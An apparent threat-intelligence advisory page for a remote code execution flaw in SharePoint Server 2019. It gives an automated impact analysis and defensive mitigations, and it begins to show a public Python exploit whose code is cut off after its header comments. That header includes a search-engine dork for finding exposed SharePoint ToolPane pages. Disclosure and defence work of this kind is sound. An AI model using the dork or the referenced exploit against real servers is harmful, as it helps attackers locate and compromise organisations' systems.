
Microsoft SharePoint Server 2019 (16.0.10383.20020) - Remote Code Execution (RCE)

Critical
Published: Mon Aug 11 2025 (08/11/2025, 00:00:00 UTC)
Source: Exploit-DB RSS Feed

Description

A critical remote code execution (RCE) vulnerability affects Microsoft SharePoint Server 2019 version 16.0.10383.20020. This exploit allows an unauthenticated attacker to execute arbitrary code on the vulnerable server remotely, potentially leading to full system compromise. The vulnerability is exploitable without user interaction and does not require authentication, increasing its risk. Exploit code is publicly available in Python, facilitating easier exploitation by attackers. Although no known exploits are currently observed in the wild, the presence of public exploit code elevates the threat level. European organizations using this SharePoint version are at risk of data breaches, service disruption, and lateral movement within networks. Mitigation is urgent, but no official patches or updates are currently linked, requiring organizations to apply temporary workarounds and hardening measures.

AI-Powered Analysis

Last updated: 10/19/2025, 01:23:11 UTC

Technical Analysis

The identified security threat is a critical remote code execution vulnerability in Microsoft SharePoint Server 2019, specifically version 16.0.10383.20020. SharePoint Server is widely used for enterprise content management and collaboration, making it a high-value target. The vulnerability allows attackers to remotely execute arbitrary code on the server without requiring authentication or user interaction, which significantly lowers the barrier to exploitation. The exploit leverages flaws in the SharePoint server's handling of certain requests, enabling attackers to inject and execute malicious payloads. Publicly available exploit code written in Python has been published on Exploit-DB (ID 52405), which can be used by attackers to automate exploitation attempts. Although no active exploitation in the wild has been reported yet, the availability of exploit code increases the likelihood of imminent attacks. The absence of official patches or mitigation guidance in the provided information suggests that organizations must rely on interim security controls such as network segmentation, strict access controls, and monitoring for suspicious activity. Given SharePoint's role in managing sensitive corporate data and workflows, successful exploitation could lead to data exfiltration, disruption of business operations, and further compromise of internal networks.

Potential Impact

For European organizations, the impact of this RCE vulnerability could be severe. SharePoint servers often host sensitive documents, internal communications, and business-critical applications. Exploitation could lead to unauthorized access to confidential information, intellectual property theft, and disruption of collaboration services. Additionally, attackers gaining code execution on SharePoint servers could pivot to other internal systems, escalating privileges and causing widespread damage. Critical sectors such as finance, healthcare, government, and manufacturing, which heavily rely on SharePoint for document management and workflow automation, would face increased risks of operational downtime and regulatory non-compliance due to data breaches. The potential for ransomware deployment or espionage activities also raises the stakes for affected organizations. The lack of patches means that the window of vulnerability remains open, increasing exposure until mitigations or updates are applied.

Mitigation Recommendations

Given the absence of official patches, European organizations should implement immediate compensating controls. These include restricting inbound access to SharePoint servers using firewalls and network segmentation, limiting SharePoint administrative privileges to the minimum necessary, and enforcing strong authentication and authorization policies. Monitoring and logging SharePoint server activity for unusual or unauthorized requests can help detect exploitation attempts early. Organizations should also consider disabling or restricting vulnerable SharePoint features or services if feasible. Applying the latest cumulative updates for SharePoint Server 2019, once available, is critical. Additionally, conducting internal vulnerability assessments and penetration tests focused on SharePoint can identify exposure. Incident response plans should be updated to address potential exploitation scenarios. Finally, educating IT staff about this vulnerability and the presence of public exploit code will improve preparedness and response.


Technical Details

Edb Id: 52405
Has Exploit Code: true
Code Language: python

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for Microsoft SharePoint Server 2019 (16.0.10383.20020) - Remote Code Execution (RCE)

# Exploit Title: Microsoft SharePoint Server 2019 – Remote Code Execution (RCE)
# Google Dork: intitle:"Microsoft SharePoint" inurl:"/_layouts/15/ToolPane.aspx"
# Date: 2025-08-07
# Exploit Author: Agampreet Singh (RedRoot Tool Maker – https://github.com/Agampreet-Singh/RedRoot)
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration
# Version: SharePoint Server 2019 (16.0.10383.20020)
# Tested on: Windows Server 2019 (
... (3574 more characters)
Code Length: 4,074 characters

Threat ID: 689a95b8ad5a09ad002b097b

Added to database: 8/12/2025, 1:15:36 AM

Last enriched: 10/19/2025, 1:23:11 AM

Last updated: 10/19/2025, 3:22:41 PM
